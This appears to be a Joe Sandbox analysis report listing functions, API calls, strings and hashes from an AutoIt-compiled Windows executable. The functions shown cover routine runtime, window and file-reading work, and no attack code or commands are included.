                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                • String ID: 0SH
                                                • API String ID: 3363477735-851180471
                                                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: IsThemeActive$uxtheme.dll
                                                • API String ID: 2574300362-3542929980
                                                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                • TranslateMessage.USER32(?), ref: 00409556
                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                • API String ID: 1762048999-758534266
                                                • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • __wcsicoll.LIBCMT ref: 00402007
                                                • __wcsicoll.LIBCMT ref: 0040201D
                                                • __wcsicoll.LIBCMT ref: 00402033
                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                • __wcsicoll.LIBCMT ref: 00402049
                                                • _wcscpy.LIBCMT ref: 0040207C
                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                • API String ID: 3948761352-1609664196
                                                • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                • __wsplitpath.LIBCMT ref: 0040E41C
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcsncat.LIBCMT ref: 0040E433
                                                • __wmakepath.LIBCMT ref: 0040E44F
                                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • _wcscpy.LIBCMT ref: 0040E487
                                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                • _wcscat.LIBCMT ref: 00427541
                                                • _wcslen.LIBCMT ref: 00427551
                                                • _wcslen.LIBCMT ref: 00427562
                                                • _wcscat.LIBCMT ref: 0042757C
                                                • _wcsncpy.LIBCMT ref: 004275BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                • String ID: Include$\
                                                • API String ID: 3173733714-3429789819
                                                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • _fseek.LIBCMT ref: 0045292B
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                • __fread_nolock.LIBCMT ref: 00452961
                                                • __fread_nolock.LIBCMT ref: 00452971
                                                • __fread_nolock.LIBCMT ref: 0045298A
                                                • __fread_nolock.LIBCMT ref: 004529A5
                                                • _fseek.LIBCMT ref: 004529BF
                                                • _malloc.LIBCMT ref: 004529CA
                                                • _malloc.LIBCMT ref: 004529D6
                                                • __fread_nolock.LIBCMT ref: 004529E7
                                                • _free.LIBCMT ref: 00452A17
                                                • _free.LIBCMT ref: 00452A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                • String ID:
                                                • API String ID: 1255752989-0
                                                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                • String ID: FILE
                                                • API String ID: 3888824918-3121273764
                                                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                • ImageList_ReplaceIcon.COMCTL32(00ACED10,000000FF,00000000), ref: 00410552
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                • RegisterClassExW.USER32(?), ref: 0041045D
                                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00ACED10,000000FF,00000000), ref: 00410552
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _malloc
                                                • String ID: Default
                                                • API String ID: 1579825452-753088835
                                                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1984 425d16 1982->1984 1985 40f6c8-40f6d6 1982->1985 1983->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1984 1991->1970
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_fseek_memmove_strcat
                                                • String ID: AU3!$EA06
                                                • API String ID: 1268643489-2658333250
                                                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1997 401144-40114a 1995->1997 1998 40111b-40111e 1995->1998 1996->1995 1999 401182 1996->1999 2001 401184-40118e call 401250 1997->2001 2002 40114c-40114f 1997->2002 1998->1997 2000 401120-401126 1998->2000 2003 40112c-401141 DefWindowProcW 1999->2003 2000->2003 2004 42b038-42b03f 2000->2004 2013 401193-40119a 2001->2013 2005 401151-401157 2002->2005 2006 40119d 2002->2006 2004->2003 2012 42b045-42b059 call 401000 call 40e0c0 2004->2012 2010 401219-40121f 2005->2010 2011 40115d 2005->2011 2008 4011a3-4011a9 2006->2008 2009 42afb4-42afc5 call 40f190 2006->2009 2008->2000 2014 4011af 2008->2014 2009->2013 2010->2000 2017 401225-42b06d call 468b0e 2010->2017 2015 401163-401166 2011->2015 2016 42b01d-42b024 2011->2016 2012->2003 2014->2000 2020 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2014->2020 2021 4011db-401202 SetTimer RegisterWindowMessageW 2014->2021 2023 42afe9-42b018 call 40f190 call 401a50 2015->2023 2024 40116c-401172 2015->2024 2016->2003 2022 42b02a-42b033 call 4370f4 2016->2022 2017->2013 2021->2013 2031 401204-401216 CreatePopupMenu 2021->2031 2022->2003 2023->2003 2024->2000 2033 401174-42afde call 45fd57 2024->2033 2033->2003 2045 42afe4 2033->2045 2045->2013
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                • CreatePopupMenu.USER32 ref: 00401204
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
